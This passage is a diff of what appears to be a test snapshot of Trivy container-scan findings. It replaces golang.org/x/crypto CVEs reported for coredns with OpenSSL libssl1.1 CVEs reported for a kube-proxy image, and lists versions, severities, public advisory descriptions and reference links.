"https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=853c5e56ee0b8650c73140816bb8b91d6163422c", }, { "type": "URL", - "value": "https://github.com/etcd-io/etcd/commit/f4b650b51dc4a53a8700700dc12e1242ac56ba07", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9e209944b35cf82368071f160a744b6178f9b098", }, { "type": "URL", - "value": "https://github.com/etcd-io/etcd/pull/11793", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=db779b0e10b047f2585615e0b8f2acdf21f8544a", }, { "type": "URL", - "value": "https://github.com/etcd-io/etcd/security/advisories/GHSA-p4g4-wgrh-qrg2", + "value": "https://linux.oracle.com/cve/CVE-2023-2650.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/L6B6R43Y7M3DCHWK3L3UVGE2K6WWECMP/", + "value": "https://linux.oracle.com/errata/ELSA-2023-3722.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-15106", + "value": "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2020-0005", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-2650", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5628-1", + "value": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2023-0009", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5628-2", + "value": "https://ubuntu.com/security/notices/USN-6119-1", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2020-15106", + "value": "https://ubuntu.com/security/notices/USN-6188-1", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2023-2650", + }, + { + "type": "URL", + "value": "https://www.debian.org/security/2023/dsa-5417", + }, + { + "type": "URL", + "value": "https://www.openssl.org/news/secadv/20230530.txt", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": "0.0.0-20201216223049-8b5274cf687f", - "foundIn": "Target: 'coredns' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2020-29652", - "installedVersion": "v0.0.0-20201002170205-7f63de1d35b0", - "packageName": "golang.org/x/crypto", + "fixedVersion": "1.1.1d-0+deb10u8", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-4160", + "installedVersion": "1.1.1d-0+deb10u6", + "packageName": "libssl1.1", "references": [ - "https://access.redhat.com/security/cve/CVE-2020-29652", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-29652", - "https://errata.almalinux.org/8/ALSA-2021-1796.html", - "https://github.com/advisories/GHSA-3vm4-22fp-5rfm", - "https://go-review.googlesource.com/c/crypto/+/278852", - "https://go.dev/cl/278852", - "https://go.googlesource.com/crypto/+/8b5274cf687fd9316b4108863654cc57385531e8", - "https://groups.google.com/g/golang-announce/c/ouZIlBimOsE?pli=1", - "https://linux.oracle.com/cve/CVE-2020-29652.html", - "https://linux.oracle.com/errata/ELSA-2021-1796.html", - "https://lists.apache.org/thread.html/r68032132c0399c29d6cdc7bd44918535da54060a10a12b1591328bff@%3Cnotifications.skywalking.apache.org%3E", - "https://nvd.nist.gov/vuln/detail/CVE-2020-29652", - "https://pkg.go.dev/vuln/GO-2021-0227", - "https://www.cve.org/CVERecord?id=CVE-2020-29652", + "https://access.redhat.com/security/cve/CVE-2021-4160", + "https://cert-portal.siemens.com/productcert/pdf/ssa-637483.pdf", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=3bf7b73ea7123045b8f972badc67ed6878e6c37f", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=6fc1aaaf303185aa5e483e06bdfae16daa9193a7", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=e9e726506cd2a3fd9c0f12daf8cc1fe934c7dddb", + "https://nvd.nist.gov/vuln/detail/CVE-2021-4160", + "https://security.gentoo.org/glsa/202210-02", + "https://www.cve.org/CVERecord?id=CVE-2021-4160", + "https://www.debian.org/security/2022/dsa-5103", + "https://www.openssl.org/news/secadv/20220128.txt", + "https://www.oracle.com/security-alerts/cpuapr2022.html", + "https://www.oracle.com/security-alerts/cpujul2022.html", ], }, "category": "Vulnerability", - "description": "A nil pointer dereference in the golang.org/x/crypto/ssh component through v0.0.0-20201203163018-be400aefbc4c for Go allows remote attackers to cause a denial of service against SSH servers.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Deployment&Name=coredns", + "description": "There is a carry propagation bug in the MIPS32 and MIPS64 squaring procedure. Many EC algorithms are affected, including some of the TLS 1.3 default curves. Impact was not analyzed in detail, because the pre-requisites for attack are considered unlikely and include reusing private keys. Analysis suggests that attacks against RSA and DSA as a result of this defect would be very difficult to perform and are not believed likely. Attacks against DH are considered just feasible (although very difficult) because most of the work necessary to deduce information about a private key may be performed offline. The amount of resources required for such an attack would be significant. However, for an attack on TLS to be meaningful, the server would have to share the DH private key among multiple clients, which is no longer an option since CVE-2016-0701. This issue affects OpenSSL versions 1.0.2, 1.1.1 and 3.0.0. It was addressed in the releases of 1.1.1m and 3.0.1 on the 15th of December 2021. For the 1.0.2 release it is addressed in git commit 6fc1aaaf3 that is available to premium support customers only. It will be made available in 1.0.2zc when it is released. The issue only affects OpenSSL on MIPS platforms. Fixed in OpenSSL 3.0.1 (Affected 3.0.0). Fixed in OpenSSL 1.1.1m (Affected 1.1.1-1.1.1l). Fixed in OpenSSL 1.0.2zc-dev (Affected 1.0.2-1.0.2zb).", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "golang: crypto/ssh: crafted authentication request can lead to nil pointer dereference", + "name": "openssl: Carry propagation bug in the MIPS32 and MIPS64 squaring procedure", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2020-29652", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2020-29652", - }, - { - "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-29652", + "value": "https://avd.aquasec.com/nvd/cve-2021-4160", }, { "type": "URL", - "value": "https://errata.almalinux.org/8/ALSA-2021-1796.html", + "value": "https://access.redhat.com/security/cve/CVE-2021-4160", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-3vm4-22fp-5rfm", + "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-637483.pdf", }, { "type": "URL", - "value": "https://go-review.googlesource.com/c/crypto/+/278852", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=3bf7b73ea7123045b8f972badc67ed6878e6c37f", }, { "type": "URL", - "value": "https://go.dev/cl/278852", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=6fc1aaaf303185aa5e483e06bdfae16daa9193a7", }, { "type": "URL", - "value": "https://go.googlesource.com/crypto/+/8b5274cf687fd9316b4108863654cc57385531e8", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=e9e726506cd2a3fd9c0f12daf8cc1fe934c7dddb", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/ouZIlBimOsE?pli=1", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-4160", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2020-29652.html", + "value": "https://security.gentoo.org/glsa/202210-02", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-1796.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-4160", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r68032132c0399c29d6cdc7bd44918535da54060a10a12b1591328bff@%3Cnotifications.skywalking.apache.org%3E", + "value": "https://www.debian.org/security/2022/dsa-5103", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-29652", + "value": "https://www.openssl.org/news/secadv/20220128.txt", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2021-0227", + "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2020-29652", + "value": "https://www.oracle.com/security-alerts/cpujul2022.html", }, ], - "severity": "HIGH", + "severity": "MEDIUM", }, { "attributes": { - "fixedVersion": "0.0.0-20211202192323-5770296d904e", - "foundIn": "Target: 'coredns' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2021-43565", - "installedVersion": "v0.0.0-20201002170205-7f63de1d35b0", - "packageName": "golang.org/x/crypto", + "fixedVersion": "1.1.1n-0+deb10u4", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-2097", + "installedVersion": "1.1.1d-0+deb10u6", + "packageName": "libssl1.1", "references": [ - "https://access.redhat.com/security/cve/CVE-2021-43565", - "https://github.com/advisories/GHSA-gwc9-m7rh-j2ww", - "https://go.dev/cl/368814/", - "https://go.dev/issues/49932", - "https://groups.google.com/forum/#!forum/golang-announce", - "https://groups.google.com/g/golang-announce/c/2AR1sKiM-Qs", - "https://nvd.nist.gov/vuln/detail/CVE-2021-43565", - "https://pkg.go.dev/vuln/GO-2022-0968", - "https://www.cve.org/CVERecord?id=CVE-2021-43565", + "https://access.redhat.com/errata/RHSA-2022:6224", + "https://access.redhat.com/security/cve/CVE-2022-2097", + "https://bugzilla.redhat.com/2081494", + "https://bugzilla.redhat.com/2087911", + "https://bugzilla.redhat.com/2087913", + "https://bugzilla.redhat.com/2097310", + "https://bugzilla.redhat.com/2104905", + "https://bugzilla.redhat.com/show_bug.cgi?id=2081494", + "https://bugzilla.redhat.com/show_bug.cgi?id=2097310", + "https://bugzilla.redhat.com/show_bug.cgi?id=2100554", + "https://bugzilla.redhat.com/show_bug.cgi?id=2104905", + "https://cert-portal.siemens.com/productcert/pdf/ssa-332410.pdf", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1292", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2068", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2097", + "https://errata.almalinux.org/9/ALSA-2022-6224.html", + "https://errata.rockylinux.org/RLSA-2022:5818", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=919925673d6c9cfed3c1085497f5dfbbed5fc431", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=a98f339ddd7e8f487d6e0088d4a9a42324885a93", + "https://github.com/advisories/GHSA-3wx7-46ch-7rq2", + "https://linux.oracle.com/cve/CVE-2022-2097.html", + "https://linux.oracle.com/errata/ELSA-2022-9751.html", + "https://lists.debian.org/debian-lts-announce/2023/02/msg00019.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/R6CK57NBQFTPUMXAPJURCGXUYT76NQAK/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/V6567JERRHHJW2GNGJGKDRNHR7SNPZK7/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VCMNWKERPBKOEBNL7CLTTX3ZZCZLH7XA/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-2097", + "https://rustsec.org/advisories/RUSTSEC-2022-0032.html", + "https://security.gentoo.org/glsa/202210-02", + "https://security.netapp.com/advisory/ntap-20220715-0011/", + "https://security.netapp.com/advisory/ntap-20230420-0008/", + "https://ubuntu.com/security/notices/USN-5502-1", + "https://www.cve.org/CVERecord?id=CVE-2022-2097", + "https://www.debian.org/security/2023/dsa-5343", + "https://www.openssl.org/news/secadv/20220705.txt", ], }, "category": "Vulnerability", - "description": "The x/crypto/ssh package before 0.0.0-20211202192323-5770296d904e of golang.org/x/crypto allows an attacker to panic an SSH server.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Deployment&Name=coredns", + "description": "AES OCB mode for 32-bit x86 platforms using the AES-NI assembly optimised implementation will not encrypt the entirety of the data under some circumstances. This could reveal sixteen bytes of data that was preexisting in the memory that wasn't written. In the special case of "in place" encryption, sixteen bytes of the plaintext would be revealed. Since OpenSSL does not support OCB based cipher suites for TLS and DTLS, they are both unaffected. Fixed in OpenSSL 3.0.5 (Affected 3.0.0-3.0.4). Fixed in OpenSSL 1.1.1q (Affected 1.1.1-1.1.1p).", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "golang.org/x/crypto: empty plaintext packet causes panic", + "name": "AES OCB fails to encrypt some bytes", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-43565", + "value": "https://avd.aquasec.com/nvd/cve-2022-2097", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-43565", + "value": "https://access.redhat.com/errata/RHSA-2022:6224", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-gwc9-m7rh-j2ww", + "value": "https://access.redhat.com/security/cve/CVE-2022-2097", }, { "type": "URL", - "value": "https://go.dev/cl/368814/", + "value": "https://bugzilla.redhat.com/2081494", }, { "type": "URL", - "value": "https://go.dev/issues/49932", + "value": "https://bugzilla.redhat.com/2087911", }, { "type": "URL", - "value": "https://groups.google.com/forum/#!forum/golang-announce", + "value": "https://bugzilla.redhat.com/2087913", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/2AR1sKiM-Qs", + "value": "https://bugzilla.redhat.com/2097310", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-43565", + "value": "https://bugzilla.redhat.com/2104905", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2022-0968", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2081494", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-43565", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2097310", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": "0.0.0-20220314234659-1baeb1ce4c0b", - "foundIn": "Target: 'coredns' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-27191", - "installedVersion": "v0.0.0-20201002170205-7f63de1d35b0", - "packageName": "golang.org/x/crypto", - "references": [ - "https://access.redhat.com/errata/RHSA-2022:8008", - "https://access.redhat.com/security/cve/CVE-2022-27191", - "https://bugzilla.redhat.com/1939485", - "https://bugzilla.redhat.com/1989564", - "https://bugzilla.redhat.com/1989570", - "https://bugzilla.redhat.com/1989575", - "https://bugzilla.redhat.com/2064702", - "https://bugzilla.redhat.com/2121445", - "https://bugzilla.redhat.com/2121453", - "https://errata.almalinux.org/9/ALSA-2022-8008.html", - "https://github.com/advisories/GHSA-8c26-wmh5-6g9v", - "https://go.dev/cl/392355", - "https://go.googlesource.com/crypto/+/1baeb1ce4c0b006eff0f294c47cb7617598dfb3d", - "https://groups.google.com/g/golang-announce", - "https://groups.google.com/g/golang-announce/c/-cp44ypCT5s", - "https://groups.google.com/g/golang-announce/c/-cp44ypCT5s/m/wmegxkLiAQAJ", - "https://linux.oracle.com/cve/CVE-2022-27191.html", - "https://linux.oracle.com/errata/ELSA-2022-8008.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DLUJZV3HBP56ADXU6QH2V7RNYUPMVBXQ/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/EZ3S7LB65N54HXXBCB67P4TTOHTNPP5O/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HHGBEGJ54DZZGTXFUQNS7ZIG3E624YAF/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/J5WPM42UR6XIBQNQPNQHM32X7S4LJTRX/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QTFOIDHQRGNI4P6LYN6ILH5G443RYYKB/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RQXU752ALW53OJAF5MG3WMR5CCZVLWW6/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/YHYRQB7TRMHDB3NEHW5XBRG7PPMUTPGV/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z55VUVGO7E5PJFXIOVAY373NZRHBNCI5/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZFUNHFHQVJSADNH7EZ3B53CYDZVEEPBP/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZQNPPQWSTP2IX7SHE6TS4SP4EVMI5EZK/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-27191", - "https://pkg.go.dev/vuln/GO-2021-0356", - "https://raw.githubusercontent.com/golang/vulndb/df2d3d326300e2ae768f00351ffa96cc2c56cf54/reports/GO-2021-0356.yaml", - "https://security.netapp.com/advisory/ntap-20220429-0002/", - "https://www.cve.org/CVERecord?id=CVE-2022-27191", - ], - }, - "category": "Vulnerability", - "description": "The golang.org/x/crypto/ssh package before 0.0.0-20220314234659-1baeb1ce4c0b for Go allows an attacker to crash a server in certain circumstances involving AddHostKey.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Deployment&Name=coredns", - "mitigation": undefined, - "name": "crash in a golang.org/x/crypto/ssh server", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-27191", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2100554", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2022:8008", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2104905", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-27191", + "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-332410.pdf", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/1939485", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1292", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/1989564", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2068", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/1989570", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2097", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/1989575", + "value": "https://errata.almalinux.org/9/ALSA-2022-6224.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2064702", + "value": "https://errata.rockylinux.org/RLSA-2022:5818", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2121445", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=919925673d6c9cfed3c1085497f5dfbbed5fc431", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2121453", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=a98f339ddd7e8f487d6e0088d4a9a42324885a93", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2022-8008.html", + "value": "https://github.com/advisories/GHSA-3wx7-46ch-7rq2", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-8c26-wmh5-6g9v", + "value": "https://linux.oracle.com/cve/CVE-2022-2097.html", }, { "type": "URL", - "value": "https://go.dev/cl/392355", + "value": "https://linux.oracle.com/errata/ELSA-2022-9751.html", }, { "type": "URL", - "value": "https://go.googlesource.com/crypto/+/1baeb1ce4c0b006eff0f294c47cb7617598dfb3d", + "value": "https://lists.debian.org/debian-lts-announce/2023/02/msg00019.html", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/R6CK57NBQFTPUMXAPJURCGXUYT76NQAK/", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/-cp44ypCT5s", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/V6567JERRHHJW2GNGJGKDRNHR7SNPZK7/", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/-cp44ypCT5s/m/wmegxkLiAQAJ", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VCMNWKERPBKOEBNL7CLTTX3ZZCZLH7XA/", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-27191.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-2097", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-8008.html", + "value": "https://rustsec.org/advisories/RUSTSEC-2022-0032.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DLUJZV3HBP56ADXU6QH2V7RNYUPMVBXQ/", + "value": "https://security.gentoo.org/glsa/202210-02", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/EZ3S7LB65N54HXXBCB67P4TTOHTNPP5O/", + "value": "https://security.netapp.com/advisory/ntap-20220715-0011/", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HHGBEGJ54DZZGTXFUQNS7ZIG3E624YAF/", + "value": "https://security.netapp.com/advisory/ntap-20230420-0008/", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/J5WPM42UR6XIBQNQPNQHM32X7S4LJTRX/", + "value": "https://ubuntu.com/security/notices/USN-5502-1", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QTFOIDHQRGNI4P6LYN6ILH5G443RYYKB/", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-2097", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RQXU752ALW53OJAF5MG3WMR5CCZVLWW6/", + "value": "https://www.debian.org/security/2023/dsa-5343", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/YHYRQB7TRMHDB3NEHW5XBRG7PPMUTPGV/", + "value": "https://www.openssl.org/news/secadv/20220705.txt", + }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": "1.1.1n-0+deb10u4", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-4304", + "installedVersion": "1.1.1d-0+deb10u6", + "packageName": "libssl1.1", + "references": [ + "https://access.redhat.com/errata/RHSA-2023:2165", + "https://access.redhat.com/security/cve/CVE-2022-4304", + "https://bugzilla.redhat.com/1960321", + "https://bugzilla.redhat.com/2164440", + "https://bugzilla.redhat.com/2164487", + "https://bugzilla.redhat.com/2164492", + "https://bugzilla.redhat.com/2164494", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144000", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144003", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144006", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144008", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144010", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144012", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144015", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144017", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144019", + "https://bugzilla.redhat.com/show_bug.cgi?id=2145170", + "https://bugzilla.redhat.com/show_bug.cgi?id=2158412", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164440", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164487", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164488", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164492", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164494", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164497", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164499", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164500", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4203", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4304", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4450", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0215", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0216", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0217", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0286", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0401", + "https://errata.almalinux.org/9/ALSA-2023-2165.html", + "https://errata.rockylinux.org/RLSA-2023:0946", + "https://github.com/advisories/GHSA-p52g-cm5j-mjv4", + "https://linux.oracle.com/cve/CVE-2022-4304.html", + "https://linux.oracle.com/errata/ELSA-2023-2932.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-4304", + "https://rustsec.org/advisories/RUSTSEC-2023-0007.html", + "https://ubuntu.com/security/notices/USN-5844-1", + "https://www.cve.org/CVERecord?id=CVE-2022-4304", + "https://www.openssl.org/news/secadv/20230207.txt", + ], + }, + "category": "Vulnerability", + "description": "A timing based side channel exists in the OpenSSL RSA Decryption implementation which could be sufficient to recover a plaintext across a network in a Bleichenbacher style attack. To achieve a successful decryption an attacker would have to be able to send a very large number of trial messages for decryption. The vulnerability affects all RSA padding modes: PKCS#1 v1.5, RSA-OEAP and RSASVE. For example, in a TLS connection, RSA is commonly used by a client to send an encrypted pre-master secret to the server. An attacker that had observed a genuine connection between a client and a server could use this flaw to send trial messages to the server and record the time taken to process them. After a sufficiently large number of messages the attacker could recover the pre-master secret used for the original connection and thus be able to decrypt the application data sent over that connection.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "timing attack in RSA Decryption implementation", + "references": [ + { + "type": "URL", + "value": "https://avd.aquasec.com/nvd/cve-2022-4304", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z55VUVGO7E5PJFXIOVAY373NZRHBNCI5/", + "value": "https://access.redhat.com/errata/RHSA-2023:2165", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZFUNHFHQVJSADNH7EZ3B53CYDZVEEPBP/", + "value": "https://access.redhat.com/security/cve/CVE-2022-4304", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZQNPPQWSTP2IX7SHE6TS4SP4EVMI5EZK/", + "value": "https://bugzilla.redhat.com/1960321", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", + "value": "https://bugzilla.redhat.com/2164440", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-27191", + "value": "https://bugzilla.redhat.com/2164487", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2021-0356", + "value": "https://bugzilla.redhat.com/2164492", }, { "type": "URL", - "value": "https://raw.githubusercontent.com/golang/vulndb/df2d3d326300e2ae768f00351ffa96cc2c56cf54/reports/GO-2021-0356.yaml", + "value": "https://bugzilla.redhat.com/2164494", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220429-0002/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144000", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-27191", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144003", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": "0.0.0-20210520170846-37e1c6afe023", - "foundIn": "Target: 'coredns' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2021-33194", - "installedVersion": "v0.0.0-20200707034311-ab3426394381", - "packageName": "golang.org/x/net", - "references": [ - "https://access.redhat.com/security/cve/CVE-2021-33194", - "https://github.com/advisories/GHSA-83g2-8m93-v3w7", - "https://github.com/golang/net/commit/37e1c6afe02340126705deced573a85ab75209d7", - "https://go.dev/cl/311090", - "https://go.dev/issue/46288", - "https://go.googlesource.com/net/+/37e1c6afe02340126705deced573a85ab75209d7", - "https://groups.google.com/g/golang-announce/c/wPunbCPkWUg", - "https://groups.google.com/g/golang-dev/c/28x0nthP-c8/m/KqWVTjsnBAAJ", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4CHKSFMHZVOBCZSSVRE3UEYNKARTBMTM/", - "https://nvd.nist.gov/vuln/detail/CVE-2021-33194", - "https://pkg.go.dev/vuln/GO-2021-0238", - "https://www.cve.org/CVERecord?id=CVE-2021-33194", - ], - }, - "category": "Vulnerability", - "description": "golang.org/x/net before v0.0.0-20210520170846-37e1c6afe023 allows attackers to cause a denial of service (infinite loop) via crafted ParseFragment input.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Deployment&Name=coredns", - "mitigation": undefined, - "name": "golang: x/net/html: infinite loop in ParseFragment", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-33194", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144006", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-33194", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144008", }, { "type": "URL", - "value": 